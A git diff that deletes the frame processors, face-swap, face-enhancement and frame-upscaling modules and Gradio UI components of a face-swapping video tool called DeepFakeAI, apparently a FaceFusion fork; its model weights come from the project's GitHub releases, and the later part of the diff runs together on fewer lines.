-def get_frame_processors_modules(frame_processors : List[str]) -> List[ModuleType]:
-	global FRAME_PROCESSORS_MODULES
-
-	if not FRAME_PROCESSORS_MODULES:
-		for frame_processor in frame_processors:
-			frame_processor_module = load_frame_processor_module(frame_processor)
-			FRAME_PROCESSORS_MODULES.append(frame_processor_module)
-	return FRAME_PROCESSORS_MODULES
-
-
-def clear_frame_processors_modules() -> None:
-	global FRAME_PROCESSORS_MODULES
-
-	for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
-		frame_processor_module.clear_frame_processor()
-	FRAME_PROCESSORS_MODULES = []
-
-
-def multi_process_frame(source_path : str, temp_frame_paths : List[str], process_frames: Callable[[str, List[str], Any], None], update: Callable[[], None]) -> None:
-	with ThreadPoolExecutor(max_workers = DeepFakeAI.globals.execution_thread_count) as executor:
-		futures = []
-		queue = create_queue(temp_frame_paths)
-		queue_per_future = max(len(temp_frame_paths) // DeepFakeAI.globals.execution_thread_count * DeepFakeAI.globals.execution_queue_count, 1)
-		while not queue.empty():
-			future = executor.submit(process_frames, source_path, pick_queue(queue, queue_per_future), update)
-			futures.append(future)
-		for future in as_completed(futures):
-			future.result()
-
-
-def create_queue(temp_frame_paths : List[str]) -> Queue[str]:
-	queue: Queue[str] = Queue()
-	for frame_path in temp_frame_paths:
-		queue.put(frame_path)
-	return queue
-
-
-def pick_queue(queue : Queue[str], queue_per_future : int) -> List[str]:
-	queues = []
-	for _ in range(queue_per_future):
-		if not queue.empty():
-			queues.append(queue.get())
-	return queues
-
-
-def process_video(source_path : str, frame_paths : List[str], process_frames : Callable[[str, List[str], Any], None]) -> None:
-	progress_bar_format = '{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, {rate_fmt}{postfix}]'
-	total = len(frame_paths)
-	with tqdm(total = total, desc = wording.get('processing'), unit = 'frame', dynamic_ncols = True, bar_format = progress_bar_format) as progress:
-		multi_process_frame(source_path, frame_paths, process_frames, lambda: update_progress(progress))
-
-
-def update_progress(progress : Any = None) -> None:
-	process = psutil.Process(os.getpid())
-	memory_usage = process.memory_info().rss / 1024 / 1024 / 1024
-	progress.set_postfix(
-	{
-		'memory_usage': '{:.2f}'.format(memory_usage).zfill(5) + 'GB',
-		'execution_providers': DeepFakeAI.globals.execution_providers,
-		'execution_thread_count': DeepFakeAI.globals.execution_thread_count,
-		'execution_queue_count': DeepFakeAI.globals.execution_queue_count
-	})
-	progress.refresh()
-	progress.update(1)
-
-
-def get_device() -> str:
-	if 'CUDAExecutionProvider' in DeepFakeAI.globals.execution_providers:
-		return 'cuda'
-	if 'CoreMLExecutionProvider' in DeepFakeAI.globals.execution_providers:
-		return 'mps'
-	return 'cpu'
diff --git a/DeepFakeAI/processors/frame/modules/__init__.py b/DeepFakeAI/processors/frame/modules/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc
deleted file mode 100644
index 5169ea224301b6d35797d6df88e7dca5e562d658..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc
deleted file mode 100644
index 75acffebdfcae9b8cc81f13b0f0eb2b4e04c8713..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc
deleted file mode 100644
index ecb76b83735c49d9b3360b53d59a09bbc67dabd5..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc
deleted file mode 100644
index 1a4289669ae04f4ecaeb6ec0bdba0be429f92785..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/modules/face_enhancer.py b/DeepFakeAI/processors/frame/modules/face_enhancer.py
deleted file mode 100644
index 65cfc5f5ef67352315ee8b2215f6cd00f8f6d241..0000000000000000000000000000000000000000
--- a/DeepFakeAI/processors/frame/modules/face_enhancer.py
+++ /dev/null
@@ -1,100 +0,0 @@
-from typing import Any, List, Callable
-import cv2
-import threading
-from gfpgan.utils import GFPGANer
-
-import DeepFakeAI.globals
-import DeepFakeAI.processors.frame.core as frame_processors
-from DeepFakeAI import wording
-from DeepFakeAI.core import update_status
-from DeepFakeAI.face_analyser import get_many_faces
-from DeepFakeAI.typing import Frame, Face
-from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video
-
-FRAME_PROCESSOR = None
-THREAD_SEMAPHORE = threading.Semaphore()
-THREAD_LOCK = threading.Lock()
-NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_ENHANCER'
-
-
-def get_frame_processor() -> Any:
-	global FRAME_PROCESSOR
-
-	with THREAD_LOCK:
-		if FRAME_PROCESSOR is None:
-			model_path = resolve_relative_path('../.assets/models/GFPGANv1.4.pth')
-			FRAME_PROCESSOR = GFPGANer(
-				model_path = model_path,
-				upscale = 1,
-				device = frame_processors.get_device()
-			)
-	return FRAME_PROCESSOR
-
-
-def clear_frame_processor() -> None:
-	global FRAME_PROCESSOR
-
-	FRAME_PROCESSOR = None
-
-
-def pre_check() -> bool:
-	download_directory_path = resolve_relative_path('../.assets/models')
-	conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/GFPGANv1.4.pth'])
-	return True
-
-
-def pre_process() -> bool:
-	if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path):
-		update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME)
-		return False
-	return True
-
-
-def post_process() -> None:
-	clear_frame_processor()
-
-
-def enhance_face(target_face : Face, temp_frame : Frame) -> Frame:
-	start_x, start_y, end_x, end_y = map(int, target_face['bbox'])
-	padding_x = int((end_x - start_x) * 0.5)
-	padding_y = int((end_y - start_y) * 0.5)
-	start_x = max(0, start_x - padding_x)
-	start_y = max(0, start_y - padding_y)
-	end_x = max(0, end_x + padding_x)
-	end_y = max(0, end_y + padding_y)
-	crop_frame = temp_frame[start_y:end_y, start_x:end_x]
-	if crop_frame.size:
-		with THREAD_SEMAPHORE:
-			_, _, crop_frame = get_frame_processor().enhance(
-				crop_frame,
-				paste_back = True
-			)
-		temp_frame[start_y:end_y, start_x:end_x] = crop_frame
-	return temp_frame
-
-
-def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame:
-	many_faces = get_many_faces(temp_frame)
-	if many_faces:
-		for target_face in many_faces:
-			temp_frame = enhance_face(target_face, temp_frame)
-	return temp_frame
-
-
-def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None:
-	for temp_frame_path in temp_frame_paths:
-		temp_frame = cv2.imread(temp_frame_path)
-		result_frame = process_frame(None, None, temp_frame)
-		cv2.imwrite(temp_frame_path, result_frame)
-		if update:
-			update()
-
-
-def process_image(source_path : str, target_path : str, output_path : str) -> None:
-	target_frame = cv2.imread(target_path)
-	result_frame = process_frame(None, None, target_frame)
-	cv2.imwrite(output_path, result_frame)
-
-
-def process_video(source_path : str, temp_frame_paths : List[str]) -> None:
-	DeepFakeAI.processors.frame.core.process_video(None, temp_frame_paths, process_frames)
diff --git a/DeepFakeAI/processors/frame/modules/face_swapper.py b/DeepFakeAI/processors/frame/modules/face_swapper.py
deleted file mode 100644
index 3479b577eb5bf6a9f04ce48e32350fc1490eba12..0000000000000000000000000000000000000000
--- a/DeepFakeAI/processors/frame/modules/face_swapper.py
+++ /dev/null
@@ -1,105 +0,0 @@
-from typing import Any, List, Callable
-import cv2
-import insightface
-import threading
-
-import DeepFakeAI.globals
-import DeepFakeAI.processors.frame.core as frame_processors
-from DeepFakeAI import wording
-from DeepFakeAI.core import update_status
-from DeepFakeAI.face_analyser import get_one_face, get_many_faces, find_similar_faces
-from DeepFakeAI.face_reference import get_face_reference, set_face_reference
-from DeepFakeAI.typing import Face, Frame
-from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video
-
-FRAME_PROCESSOR = None
-THREAD_LOCK = threading.Lock()
-NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_SWAPPER'
-
-
-def get_frame_processor() -> Any:
-	global FRAME_PROCESSOR
-
-	with THREAD_LOCK:
-		if FRAME_PROCESSOR is None:
-			model_path = resolve_relative_path('../.assets/models/inswapper_128.onnx')
-			FRAME_PROCESSOR = insightface.model_zoo.get_model(model_path, providers = DeepFakeAI.globals.execution_providers)
-	return FRAME_PROCESSOR
-
-
-def clear_frame_processor() -> None:
-	global FRAME_PROCESSOR
-
-	FRAME_PROCESSOR = None
-
-
-def pre_check() -> bool:
-	download_directory_path = resolve_relative_path('../.assets/models')
-	conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128.onnx'])
-	return True
-
-
-def pre_process() -> bool:
-	if not is_image(DeepFakeAI.globals.source_path):
-		update_status(wording.get('select_image_source') + wording.get('exclamation_mark'), NAME)
-		return False
-	elif not get_one_face(cv2.imread(DeepFakeAI.globals.source_path)):
-		update_status(wording.get('no_source_face_detected') + wording.get('exclamation_mark'), NAME)
-		return False
-	if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path):
-		update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME)
-		return False
-	return True
-
-
-def post_process() -> None:
-	clear_frame_processor()
-
-
-def swap_face(source_face : Face, target_face : Face, temp_frame : Frame) -> Frame:
-	return get_frame_processor().get(temp_frame, target_face, source_face, paste_back = True)
-
-
-def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame:
-	if 'reference' in DeepFakeAI.globals.face_recognition:
-		similar_faces = find_similar_faces(temp_frame, reference_face, DeepFakeAI.globals.reference_face_distance)
-		if similar_faces:
-			for similar_face in similar_faces:
-				temp_frame = swap_face(source_face, similar_face, temp_frame)
-	if 'many' in DeepFakeAI.globals.face_recognition:
-		many_faces = get_many_faces(temp_frame)
-		if many_faces:
-			for target_face in many_faces:
-				temp_frame = swap_face(source_face, target_face, temp_frame)
-	return temp_frame
-
-
-def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None:
-	source_face = get_one_face(cv2.imread(source_path))
-	reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None
-	for temp_frame_path in temp_frame_paths:
-		temp_frame = cv2.imread(temp_frame_path)
-		result_frame = process_frame(source_face, reference_face, temp_frame)
-		cv2.imwrite(temp_frame_path, result_frame)
-		if update:
-			update()
-
-
-def process_image(source_path : str, target_path : str, output_path : str) -> None:
-	source_face = get_one_face(cv2.imread(source_path))
-	target_frame = cv2.imread(target_path)
-	reference_face = get_one_face(target_frame, DeepFakeAI.globals.reference_face_position) if 'reference' in DeepFakeAI.globals.face_recognition else None
-	result_frame = process_frame(source_face, reference_face, target_frame)
-	cv2.imwrite(output_path, result_frame)
-
-
-def process_video(source_path : str, temp_frame_paths : List[str]) -> None:
-	conditional_set_face_reference(temp_frame_paths)
-	frame_processors.process_video(source_path, temp_frame_paths, process_frames)
-
-
-def conditional_set_face_reference(temp_frame_paths : List[str]) -> None:
-	if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference():
-		reference_frame = cv2.imread(temp_frame_paths[DeepFakeAI.globals.reference_frame_number])
-		reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position)
-		set_face_reference(reference_face)
diff --git a/DeepFakeAI/processors/frame/modules/frame_enhancer.py b/DeepFakeAI/processors/frame/modules/frame_enhancer.py
deleted file mode 100644
index 9c5b9e0f783b2805e234b409e658ad4d57cadaed..0000000000000000000000000000000000000000
--- a/DeepFakeAI/processors/frame/modules/frame_enhancer.py
+++ /dev/null
@@ -1,88 +0,0 @@
-from typing import Any, List, Callable
-import cv2
-import threading
-from basicsr.archs.rrdbnet_arch import RRDBNet
-from realesrgan import RealESRGANer
-
-import DeepFakeAI.processors.frame.core as frame_processors
-from DeepFakeAI.typing import Frame, Face
-from DeepFakeAI.utilities import conditional_download, resolve_relative_path
-
-FRAME_PROCESSOR = None
-THREAD_SEMAPHORE = threading.Semaphore()
-THREAD_LOCK = threading.Lock()
-NAME = 'FACEFUSION.FRAME_PROCESSOR.FRAME_ENHANCER'
-
-
-def get_frame_processor() -> Any:
-	global FRAME_PROCESSOR
-
-	with THREAD_LOCK:
-		if FRAME_PROCESSOR is None:
-			model_path = resolve_relative_path('../.assets/models/RealESRGAN_x4plus.pth')
-			FRAME_PROCESSOR = RealESRGANer(
-				model_path = model_path,
-				model = RRDBNet(
-					num_in_ch = 3,
-					num_out_ch = 3,
-					num_feat = 64,
-					num_block = 23,
-					num_grow_ch = 32,
-					scale = 4
-				),
-				device = frame_processors.get_device(),
-				tile = 512,
-				tile_pad = 32,
-				pre_pad = 0,
-				scale = 4
-			)
-	return FRAME_PROCESSOR
-
-
-def clear_frame_processor() -> None:
-	global FRAME_PROCESSOR
-
-	FRAME_PROCESSOR = None
-
-
-def pre_check() -> bool:
-	download_directory_path = resolve_relative_path('../.assets/models')
-	conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/RealESRGAN_x4plus.pth'])
-	return True
-
-
-def pre_process() -> bool:
-	return True
-
-
-def post_process() -> None:
-	clear_frame_processor()
-
-
-def enhance_frame(temp_frame : Frame) -> Frame:
-	with THREAD_SEMAPHORE:
-		temp_frame, _ = get_frame_processor().enhance(temp_frame, outscale = 1)
-	return temp_frame
-
-
-def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame:
-	return enhance_frame(temp_frame)
-
-
-def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None:
-	for temp_frame_path in temp_frame_paths:
-		temp_frame = cv2.imread(temp_frame_path)
-		result_frame = process_frame(None, None, temp_frame)
-		cv2.imwrite(temp_frame_path, result_frame)
-		if update:
-			update()
-
-
-def process_image(source_path : str, target_path : str, output_path : str) -> None:
-	target_frame = cv2.imread(target_path)
-	result = process_frame(None, None, target_frame)
-	cv2.imwrite(output_path, result)
-
-
-def process_video(source_path : str, temp_frame_paths : List[str]) -> None:
-	frame_processors.process_video(None, temp_frame_paths, process_frames)
diff --git a/DeepFakeAI/typing.py b/DeepFakeAI/typing.py
deleted file mode 100644
index 74f2b8746172ce2d58705f073a45c2276766ce60..0000000000000000000000000000000000000000
--- a/DeepFakeAI/typing.py
+++ /dev/null
@@ -1,13 +0,0 @@
-from typing import Any, Literal
-from insightface.app.common import Face
-import numpy
-
-Face = Face
-Frame = numpy.ndarray[Any, Any]
-
-FaceRecognition = Literal[ 'reference', 'many' ]
-FaceAnalyserDirection = Literal[ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small' ]
-FaceAnalyserAge = Literal[ 'child', 'teen', 'adult', 'senior' ]
-FaceAnalyserGender = Literal[ 'male', 'female' ]
-TempFrameFormat = Literal[ 'jpg', 'png' ]
-OutputVideoEncoder = Literal[ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ]
diff --git a/DeepFakeAI/uis/__init__.py b/DeepFakeAI/uis/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc
deleted file mode 100644
index 7e65d5e72179cfb8a3e34bc8c837be7baf1f70ff..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc
deleted file mode 100644
index 164b847092fe203effcf90fc8bc202f5ac979864..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc
deleted file mode 100644
index 711667d642e4fc9041427d068f185457b2080f28..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__init__.py b/DeepFakeAI/uis/components/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc
deleted file mode 100644
index 93d3f0014e15d391031011244703f4a6a66fd6a1..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc
deleted file mode 100644
index d0f42183e18c96b373637e15fd1d5f4d2f256d8a..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc
deleted file mode 100644
index b7891263d232d951c701fdc93d0c96a10938d04a..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc
deleted file mode 100644
index 282b65a6bce2c05a9cc85475072ec753a17d8036..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc
deleted file mode 100644
index 968fd092417ddb2f5b4ee5c65c047ac91d0a8431..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc
deleted file mode 100644
index 26fd18c65983ebe5d2c2770fd53714e4f48af985..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc
deleted file mode 100644
index 77d25365cbede84a457d8bad814bfaa7b0aca6cb..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc
deleted file mode 100644
index 653e151a536bd335cc967238441707f766e46efb..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc
deleted file mode 100644
index 8308ca2a8b3d462af61833ccc5d6a78245788947..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc
deleted file mode 100644
index 444b99edbae493ec108dc6385fc904be6d848624..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc
deleted file mode 100644
index 8cccb58080631ed048f56b813d3d271a76e7c372..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc
deleted file mode 100644
index 206d0873d82ad8965b675c0f1d95a202b7e60308..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc
deleted file mode 100644
index b1aa889546149e6cc88f235944b73d6e1f6d1a5f..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc
deleted file mode 100644
index 28bee96cb9cdbfac53435706cefa670cb0aa31ba..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/uis/components/about.py b/DeepFakeAI/uis/components/about.py
deleted file mode 100644
index 8e7beed10c76eb9d3d6900563aa2be23897beb28..0000000000000000000000000000000000000000
--- a/DeepFakeAI/uis/components/about.py
+++ /dev/null
@@ -1,13 +0,0 @@
-from typing import Optional
-import gradio
-
-from DeepFakeAI import metadata
-
-ABOUT_HTML : Optional[gradio.HTML] = None
-
-
-def render() -> None:
-	global ABOUT_HTML
-
-	with gradio.Box():
-		ABOUT_HTML = gradio.HTML('' + metadata.get('name') + ' ' + metadata.get('version') + '')
diff --git a/DeepFakeAI/uis/components/benchmark.py b/DeepFakeAI/uis/components/benchmark.py
deleted file mode 100644
index 450cdd0dc82cf74fa203698b66b8860d913917a8..0000000000000000000000000000000000000000
--- a/DeepFakeAI/uis/components/benchmark.py
+++ /dev/null
@@ -1,116 +0,0 @@
-from typing import Any, Optional, List
-import time
-import tempfile
-import statistics
-import gradio
-
-import DeepFakeAI.globals
-from DeepFakeAI import wording
-from DeepFakeAI.capturer import get_video_frame_total
-from DeepFakeAI.core import conditional_process
-from DeepFakeAI.uis.typing import Update
-from DeepFakeAI.utilities import normalize_output_path, clear_temp
-
-BENCHMARK_RESULT_DATAFRAME : Optional[gradio.Dataframe] = None
-BENCHMARK_CYCLES_SLIDER : Optional[gradio.Button] = None
-BENCHMARK_START_BUTTON : Optional[gradio.Button] = None
-BENCHMARK_CLEAR_BUTTON : Optional[gradio.Button] = None
-
-
-def render() -> None:
-	global BENCHMARK_RESULT_DATAFRAME
-	global BENCHMARK_CYCLES_SLIDER
-	global BENCHMARK_START_BUTTON
-	global BENCHMARK_CLEAR_BUTTON
-
-	with gradio.Box():
-		BENCHMARK_RESULT_DATAFRAME = gradio.Dataframe(
-			label = wording.get('benchmark_result_dataframe_label'),
-			headers =
-			[
-				'target_path',
-				'benchmark_cycles',
-				'average_run',
-				'fastest_run',
-				'slowest_run',
-				'relative_fps'
-			],
-			col_count = (6, 'fixed'),
-			row_count = (7, 'fixed'),
-			datatype =
-			[
-				'str',
-				'number',
-				'number',
-				'number',
-				'number',
-				'number'
-			]
-		)
-		BENCHMARK_CYCLES_SLIDER = gradio.Slider(
-			label = wording.get('benchmark_cycles_slider_label'),
-			minimum = 1,
-			step = 1,
-			value = 3,
-			maximum = 10
-		)
-		with gradio.Row():
-			BENCHMARK_START_BUTTON = gradio.Button(wording.get('start_button_label'))
-			BENCHMARK_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label'))
-
-
-def listen() -> None:
-	BENCHMARK_START_BUTTON.click(update, inputs = BENCHMARK_CYCLES_SLIDER, outputs = BENCHMARK_RESULT_DATAFRAME)
-	BENCHMARK_CLEAR_BUTTON.click(clear, outputs = BENCHMARK_RESULT_DATAFRAME)
-
-
-def update(benchmark_cycles : int) -> Update:
-	DeepFakeAI.globals.source_path = '.assets/examples/source.jpg'
-	target_paths =\
-	[
-		'.assets/examples/target-240p.mp4',
-		'.assets/examples/target-360p.mp4',
-		'.assets/examples/target-540p.mp4',
-		'.assets/examples/target-720p.mp4',
-		'.assets/examples/target-1080p.mp4',
-		'.assets/examples/target-1440p.mp4',
-		'.assets/examples/target-2160p.mp4'
-	]
-	value = [ benchmark(target_path, benchmark_cycles) for target_path in target_paths ]
-	return gradio.update(value = value)
-
-
-def benchmark(target_path : str, benchmark_cycles : int) -> List[Any]:
-	process_times = []
-	total_fps = 0.0
-	for i in range(benchmark_cycles + 1):
-		DeepFakeAI.globals.target_path = target_path
-		DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, tempfile.gettempdir())
-		video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path)
-		start_time = time.perf_counter()
-		conditional_process()
-		end_time = time.perf_counter()
-		process_time = end_time - start_time
-		fps = video_frame_total / process_time
-		if i > 0:
-			process_times.append(process_time)
-			total_fps += fps
-	average_run = round(statistics.mean(process_times), 2)
-	fastest_run = round(min(process_times), 2)
-	slowest_run = round(max(process_times), 2)
-	relative_fps = round(total_fps / benchmark_cycles, 2)
-	return\
-	[
-		DeepFakeAI.globals.target_path,
-		benchmark_cycles,
-		average_run,
-		fastest_run,
-		slowest_run,
-		relative_fps
-	]
-
-
-def clear() -> Update: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - return gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/execution.py b/DeepFakeAI/uis/components/execution.py deleted file mode 100644 index 23de9f5d50b365eeeee50db56af8cc78e6eccf73..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/execution.py +++ /dev/null @@ -1,64 +0,0 @@ -from typing import List, Optional -import gradio -import onnxruntime - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.face_analyser import clear_face_analyser -from DeepFakeAI.processors.frame.core import clear_frame_processors_modules -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import encode_execution_providers, decode_execution_providers - -EXECUTION_PROVIDERS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None -EXECUTION_THREAD_COUNT_SLIDER : Optional[gradio.Slider] = None -EXECUTION_QUEUE_COUNT_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global EXECUTION_PROVIDERS_CHECKBOX_GROUP - global EXECUTION_THREAD_COUNT_SLIDER - global EXECUTION_QUEUE_COUNT_SLIDER - - with gradio.Box(): - EXECUTION_PROVIDERS_CHECKBOX_GROUP = gradio.CheckboxGroup( - label = wording.get('execution_providers_checkbox_group_label'), - choices = encode_execution_providers(onnxruntime.get_available_providers()), - value = encode_execution_providers(DeepFakeAI.globals.execution_providers) - ) - EXECUTION_THREAD_COUNT_SLIDER = gradio.Slider( - label = wording.get('execution_thread_count_slider_label'), - value = DeepFakeAI.globals.execution_thread_count, - step = 1, - minimum = 1, - maximum = 128 - ) - EXECUTION_QUEUE_COUNT_SLIDER = gradio.Slider( - label = wording.get('execution_queue_count_slider_label'), - value = DeepFakeAI.globals.execution_queue_count, - step = 1, - minimum = 1, - maximum = 16 - ) - - -def listen() -> None: - EXECUTION_PROVIDERS_CHECKBOX_GROUP.change(update_execution_providers, inputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP, outputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP) - EXECUTION_THREAD_COUNT_SLIDER.change(update_execution_thread_count, inputs = EXECUTION_THREAD_COUNT_SLIDER, outputs = EXECUTION_THREAD_COUNT_SLIDER) - EXECUTION_QUEUE_COUNT_SLIDER.change(update_execution_queue_count, inputs = EXECUTION_QUEUE_COUNT_SLIDER, outputs = EXECUTION_QUEUE_COUNT_SLIDER) - - -def update_execution_providers(execution_providers : List[str]) -> Update: - clear_face_analyser() - clear_frame_processors_modules() - DeepFakeAI.globals.execution_providers = decode_execution_providers(execution_providers) - return gradio.update(value = execution_providers) - - -def update_execution_thread_count(execution_thread_count : int = 1) -> Update: - DeepFakeAI.globals.execution_thread_count = execution_thread_count - return gradio.update(value = execution_thread_count) - - -def update_execution_queue_count(execution_queue_count : int = 1) -> Update: - DeepFakeAI.globals.execution_queue_count = execution_queue_count - return gradio.update(value = execution_queue_count) diff --git a/DeepFakeAI/uis/components/face_analyser.py b/DeepFakeAI/uis/components/face_analyser.py deleted file mode 100644 index 117cd3ee22c36344954ccd18c18f4fabbeeee96d..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/face_analyser.py +++ /dev/null @@ -1,54 +0,0 @@ -from typing import Optional - -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.uis import core as ui 
